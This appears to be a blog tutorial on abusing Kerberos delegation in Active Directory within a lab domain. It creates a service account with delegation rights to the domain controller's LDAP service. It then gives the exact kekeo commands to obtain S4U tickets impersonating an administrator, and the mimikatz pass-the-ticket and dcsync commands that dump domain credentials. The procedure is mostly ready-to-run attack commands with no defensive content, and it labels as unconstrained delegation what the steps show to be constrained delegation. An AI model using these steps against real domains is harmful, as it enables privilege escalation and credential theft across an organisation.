Sometimes, I find security related posts annoying and frustrating. When I try to reproduce their POC, sometimes there's no enough info, other times the tools they reference, don't exist anymore. This is the case for kekeo. Every single post I can find, uses two tools that I can not use, because they don't exist anymore: s4u.exe and asktgt.exe. These tools where merged to a single one, and I wasn't able to find anything on the new syntax. All I could find was one guy complaining about the ticket generated by the new tool didn't have the forward flag active. That's why this tutorial was posted, to document the full attack to unconstrained delegation, step by step, in a reproducible way. Let's begin.
Context: We have 2 DCs: dc01 and dc02. Domain name is contoso.loca. We will be using a service account named popo, registered with spn http/popo. We will grant delegation permissions to this account and will use it to obtain an AD admin token to dump user credential using dcsync.
1. Create the AD account that will be used as a delegated priviledged service
New-ADUser -Name "popo" -UserPrincipalName popo
2. Change the user password
net user popo popo!!popo /dom
3. Add the spn
setspn -S http/popo popo
4. Add delegation permissions using dsa.msc. I added the permissions to transition protocol to ldap/dc01.contoso.loca, so that we can dump passwords from this service.
We now have everything we need to begin our tests. Let's first try to dump the domain administrator credentials from popo session. To do this, open mimikatz, and run:
lsadump::dcsync /domain:contoso.loca /user:CONTOSO\administrator
As you can see, access denied, as expected so far.
Now, here enters kekeo, run kekeo.exe and:
1. Request a tgt for popo from kerberos.
tgt::ask /domain:contoso.loca /user:popo /password:popo!!popo
it generates the ticket file TGT_popo@CONTOSO.LOCA_krbtgt~contoso.loca@CONTOSO.LOCA.kirbi
2. Using the popo tgt, request s4uself and s4u2proxy tickets.
tgs::s4u /tgt:TGT_popo@CONTOSO.LOCA_krbtgt~contoso.loca@CONTOSO.LOCA.kirbi /user:admin1 /service:ldap/dc01.contoso.loca
Two new ticket files are created:
TGS_admin1@CONTOSO.LOCA_popo@CONTOSO.LOCA.kirbi
TGS_admin1@CONTOSO.LOCA_ldap~dc01.contoso.loca@CONTOSO.LOCA.kirbi
Let's use those tickets now. run mimikatz.exe:
1. Load the tickets, you need both of them loaded into memory.
kerberos::ptt TGS_admin1@CONTOSO.LOCA_popo@CONTOSO.LOCA.kirbi
kerberos::ptt TGS_admin1@CONTOSO.LOCA_ldap~dc01.contoso.loca@CONTOSO.LOCA.kirbi
2. List the tickets to validate they're loaded.
kerberos::list
3. Dump the credentials using dcsync.
lsadump::dcsync /domain:contoso.loca /user:CONTOSO\admin1 /dc:dc01.contoso.loca
Et voilà!!!
